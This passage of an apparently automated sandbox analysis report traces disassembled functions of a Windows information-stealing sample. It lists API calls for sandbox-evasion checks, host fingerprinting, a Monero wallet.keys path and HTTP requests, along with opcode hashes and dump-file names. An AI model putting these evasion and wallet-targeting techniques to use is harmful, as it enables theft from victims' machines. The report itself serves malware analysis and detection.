1171->1178 1179 958d3-95948 call 9a740 * 2 call 81590 call 952c0 call 9a8a0 call 9a800 call 9aad0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 9594a-9598a call 9a7a0 call 81590 call 951f0 call 9a8a0 call 9a800 1179->1275 1199->1270 1200->1106 1249->1143 1275->1170
                                    APIs
                                      • Part of subcall function 0009A820: lstrlen.KERNEL32(00084F05,?,?,00084F05,000A0DDE), ref: 0009A82B
                                      • Part of subcall function 0009A820: lstrcpy.KERNEL32(000A0DDE,00000000), ref: 0009A885
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000956A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095857
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 000951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095228
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                      • Part of subcall function 000952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095318
                                      • Part of subcall function 000952C0: lstrlen.KERNEL32(00000000), ref: 0009532F
                                      • Part of subcall function 000952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00095364
                                      • Part of subcall function 000952C0: lstrlen.KERNEL32(00000000), ref: 00095383
                                      • Part of subcall function 000952C0: lstrlen.KERNEL32(00000000), ref: 000953AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0009578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 00095A1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: d0f574beb4bfbdb62db9a6f42d24014fafd495f662af95c57798b1eb2306ad5c
                                    • Instruction ID: 8987cf73115bf4b3ed1d96451ade0b5a555284414a49c76dc9dcdb0194dea2a8
                                    • Opcode Fuzzy Hash: d0f574beb4bfbdb62db9a6f42d24014fafd495f662af95c57798b1eb2306ad5c
                                    • Instruction Fuzzy Hash: 4EE11F71A205089ACF14FBA0EC57EEE737CAF55340F508528B50666493EF346A09EBD2
                                    Function 000917A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1301 917a0-917cd call 9aad0 StrCmpCA 1304 917cf-917d1 ExitProcess 1301->1304 1305 917d7-917f1 call 9aad0 1301->1305 1309 917f4-917f8 1305->1309 1310 917fe-91811 1309->1310 1311 919c2-919cd call 9a800 1309->1311 1313 9199e-919bd 1310->1313 1314 91817-9181a 1310->1314 1313->1309 1316 91849-91858 call 9a820 1314->1316 1317 918ad-918be StrCmpCA 1314->1317 1318 918cf-918e0 StrCmpCA 1314->1318 1319 9198f-91999 call 9a820 1314->1319 1320 91821-91830 call 9a820 1314->1320 1321 9185d-9186e StrCmpCA 1314->1321 1322 9187f-91890 StrCmpCA 1314->1322 1323 918f1-91902 StrCmpCA 1314->1323 1324 91951-91962 StrCmpCA 1314->1324 1325 91970-91981 StrCmpCA 1314->1325 1326 91913-91924 StrCmpCA 1314->1326 1327 91932-91943 StrCmpCA 1314->1327 1328 91835-91844 call 9a820 1314->1328 1316->1313 1340 918ca 1317->1340 1341 918c0-918c3 1317->1341 1342 918ec 1318->1342 1343 918e2-918e5 1318->1343 1319->1313 1320->1313 1336 9187a 1321->1336 1337 91870-91873 1321->1337 1338 9189e-918a1 1322->1338 1339 91892-9189c 1322->1339 1344 9190e 1323->1344 1345 91904-91907 1323->1345 1350 9196e 1324->1350 1351 91964-91967 1324->1351 1330 9198d 1325->1330 1331 91983-91986 1325->1331 1346 91930 1326->1346 1347 91926-91929 1326->1347 1348 9194f 1327->1348 1349 91945-91948 1327->1349 1328->1313 1330->1313 1331->1330 1336->1313 1337->1336 1355 918a8 1338->1355 1339->1355 1340->1313 1341->1340 1342->1313 1343->1342 1344->1313 1345->1344 1346->1313 1347->1346 1348->1313 1349->1348 1350->1313 1351->1350 1355->1313
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 000917C5
                                    • ExitProcess.KERNEL32 ref: 000917D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 3e070a2abf84ea5ecb93fc3414b4715184841fefbdddb1fe77a561793a152e79
                                    • Instruction ID: 27c892faaf1643cc8a74cb768586adaefd2b632e487a00e03d200d4337b56488
                                    • Opcode Fuzzy Hash: 3e070a2abf84ea5ecb93fc3414b4715184841fefbdddb1fe77a561793a152e79
                                    • Instruction Fuzzy Hash: B45138B5B0420EEBDF14DFA0DA58AFE77B5BF44704F208048E906AB241D770E951EB62
                                    Function 00097500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1356 97500-9754a GetWindowsDirectoryA 1357 9754c 1356->1357 1358 97553-975c7 GetVolumeInformationA call 98d00 * 3 1356->1358 1357->1358 1365 975d8-975df 1358->1365 1366 975fc-97617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 975e1-975fa call 98d00 1365->1367 1369 97619-97626 call 9a740 1366->1369 1370 97628-97658 wsprintfA call 9a740 1366->1370 1367->1365 1377 9767e-9768e 1369->1377 1370->1377
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00097542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0009757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097603
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0009760A
                                    • wsprintfA.USER32 ref: 00097640
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\$
                                    • API String ID: 1544550907-1928815233
                                    • Opcode ID: ece935215d299190ef4fd90a763c50f98e59e3dc584f9b7820da9551b5346b98
                                    • Instruction ID: 56a6533f98e7cee51110eb0b6ccc1866a195ce31a0948bf01b9de5b316ca4e85
                                    • Opcode Fuzzy Hash: ece935215d299190ef4fd90a763c50f98e59e3dc584f9b7820da9551b5346b98
                                    • Instruction Fuzzy Hash: 144191B1D04248ABDF10DF94DC49FEEBBB8EF08704F104199F509A7281DB74AA44DBA5
                                    Function 000969F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D31668), ref: 000998A1
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D317B8), ref: 000998BA
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D31608), ref: 000998D2
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D315C0), ref: 000998EA
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D315F0), ref: 00099903
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D38AD8), ref: 0009991B
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D25128), ref: 00099933
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D24F88), ref: 0009994C
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D31518), ref: 00099964
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D31638), ref: 0009997C
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D31530), ref: 00099995
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D31650), ref: 000999AD
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D25048), ref: 000999C5
                                      • Part of subcall function 00099860: GetProcAddress.KERNEL32(76210000,00D316C8), ref: 000999DE
                                      • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                      • Part of subcall function 000811D0: ExitProcess.KERNEL32 ref: 00081211
                                      • Part of subcall function 00081160: GetSystemInfo.KERNEL32(?), ref: 0008116A
                                      • Part of subcall function 00081160: ExitProcess.KERNEL32 ref: 0008117E
                                      • Part of subcall function 00081110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0008112B
                                      • Part of subcall function 00081110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00081132
                                      • Part of subcall function 00081110: ExitProcess.KERNEL32 ref: 00081143
                                      • Part of subcall function 00081220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0008123E
                                      • Part of subcall function 00081220: __aulldiv.LIBCMT ref: 00081258
                                      • Part of subcall function 00081220: __aulldiv.LIBCMT ref: 00081266
                                      • Part of subcall function 00081220: ExitProcess.KERNEL32 ref: 00081294
                                      • Part of subcall function 00096770: GetUserDefaultLangID.KERNEL32 ref: 00096774
                                      • Part of subcall function 00081190: ExitProcess.KERNEL32 ref: 000811C6
                                      • Part of subcall function 00097850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000811B7), ref: 00097880
                                      • Part of subcall function 00097850: RtlAllocateHeap.NTDLL(00000000), ref: 00097887
                                      • Part of subcall function 00097850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0009789F
                                      • Part of subcall function 000978E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00097910
                                      • Part of subcall function 000978E0: RtlAllocateHeap.NTDLL(00000000), ref: 00097917
                                      • Part of subcall function 000978E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0009792F
                                      • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D38988,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                      • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                      • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                      • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D38C68,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00096AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00096AF9
                                    • Sleep.KERNEL32(00001770), ref: 00096B04
                                    • CloseHandle.KERNEL32(?,00000000,?,00D38C68,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096B1A
                                    • ExitProcess.KERNEL32 ref: 00096B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2525456742-0
                                    • Opcode ID: f7a1100e60edbb3da0bbb16542ef5e8a3e8e29d1342a7ad7be186a933c03bb94
                                    • Instruction ID: 2b41a55a420a45435638e155a4bd9aa06a691f7c077b3d5e65278f6cb2bf867a
                                    • Opcode Fuzzy Hash: f7a1100e60edbb3da0bbb16542ef5e8a3e8e29d1342a7ad7be186a933c03bb94
                                    • Instruction Fuzzy Hash: 8D31EA71A50208AADF04FBF0EC5ABEEB778BF15740F104518F212A6193DF716905EBA6
                                    Function 00081220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1436 81220-81247 call 989b0 GlobalMemoryStatusEx 1439 81249-81271 call 9da00 * 2 1436->1439 1440 81273-8127a 1436->1440 1442 81281-81285 1439->1442 1440->1442 1444 8129a-8129d 1442->1444 1445 81287 1442->1445 1447 81289-81290 1445->1447 1448 81292-81294 ExitProcess 1445->1448 1447->1444 1447->1448
                                    APIs
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0008123E
                                    • __aulldiv.LIBCMT ref: 00081258
                                    • __aulldiv.LIBCMT ref: 00081266
                                    • ExitProcess.KERNEL32 ref: 00081294
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 3404098578-2766056989
                                    • Opcode ID: 9ab9ef9c1be22f0fd1fb0bbbac7ca8c9d991c6bff6abec0a1bba09b396130bd4
                                    • Instruction ID: e003f515d5a38b9f1972656083cfc934a261137a834f630560b5ed00df5f5e9b
                                    • Opcode Fuzzy Hash: 9ab9ef9c1be22f0fd1fb0bbbac7ca8c9d991c6bff6abec0a1bba09b396130bd4
                                    • Instruction Fuzzy Hash: BB014BB0940308AAEF10EBE0DC4AFDEBBB8BF04705F208049E605B62C1D67455568799
                                    Function 00096AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1450 96af3 1451 96b0a 1450->1451 1453 96aba-96ad7 call 9aad0 OpenEventA 1451->1453 1454 96b0c-96b22 call 96920 call 95b10 CloseHandle ExitProcess 1451->1454 1460 96ad9-96af1 call 9aad0 CreateEventA 1453->1460 1461 96af5-96b04 CloseHandle Sleep 1453->1461 1460->1454 1461->1451
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00D38C68,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096ACA
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00096AE8
                                    • CloseHandle.KERNEL32(00000000), ref: 00096AF9
                                    • Sleep.KERNEL32(00001770), ref: 00096B04
                                    • CloseHandle.KERNEL32(?,00000000,?,00D38C68,?,000A110C,?,00000000,?,000A1110,?,00000000,000A0AEF), ref: 00096B1A
                                    • ExitProcess.KERNEL32 ref: 00096B22
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                    • String ID:
                                    • API String ID: 941982115-0
                                    • Opcode ID: 83a074dc99b91b022755e831056145b6c648e76b93a642c276cf680f1330514f
                                    • Instruction ID: 8e6ff322a79a44aee732aef5a931523b1c9842281e0e7d7e483b3c55266c8cf8
                                    • Opcode Fuzzy Hash: 83a074dc99b91b022755e831056145b6c648e76b93a642c276cf680f1330514f
                                    • Instruction Fuzzy Hash: 3BF05E70A44209ABEF10ABA0EC1ABBE7B74FB04745F104514B512A11C2DBB25540FA97
                                    Function 000847B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2187372879.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                    • Associated: 00000000.00000002.2187334518.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187372879.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2187552344.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191006625.000000000057B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191466889.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2191488934.0000000000714000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CrackInternetlstrlen
                                    • String ID: <
                                    • API String ID: 1274457161-4251816714
                                    • Opcode ID: 3669835081fc29e5a5ec3626f1c3143fc1ce5726a4b6e4eb0c9409ec89a7f142
                                    • Instruction ID: 8b735cf9d828b78bb5e77173c6e166802ab76ecd97fa2691232cc95eb9fd9049
                                    • Opcode Fuzzy Hash: 3669835081fc29e5a5ec3626f1c3143fc1ce5726a4b6e4eb0c9409ec89a7f142
                                    • Instruction Fuzzy Hash: D2214FB1D00209ABDF14DFA4E849ADE7B74FF45320F108625F925A72C1EB706A09CF91
                                    Function 000951F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                      • Part of subcall function 00086280: InternetOpenA.WININET(000A0DFE,00000001,00000000,00000000,00000000), ref: 000862E1
                                      • Part of subcall function 00086280: StrCmpCA.SHLWAPI(?,00D3FCE0), ref: 00086303
                                      • Part of subcall function 00086280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086335
                                      • Part of subcall function 00086280: HttpOpenRequestA.WININET(00000000,GET,?,00D3F488,00000000,00000000,00400100,00000000), ref: 00086385
                                      • Part of subcall function 00086280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000863BF
                                      • Part of subcall function 00086280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000863D1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095228
                                    Strings
                                    Memory Dump Source
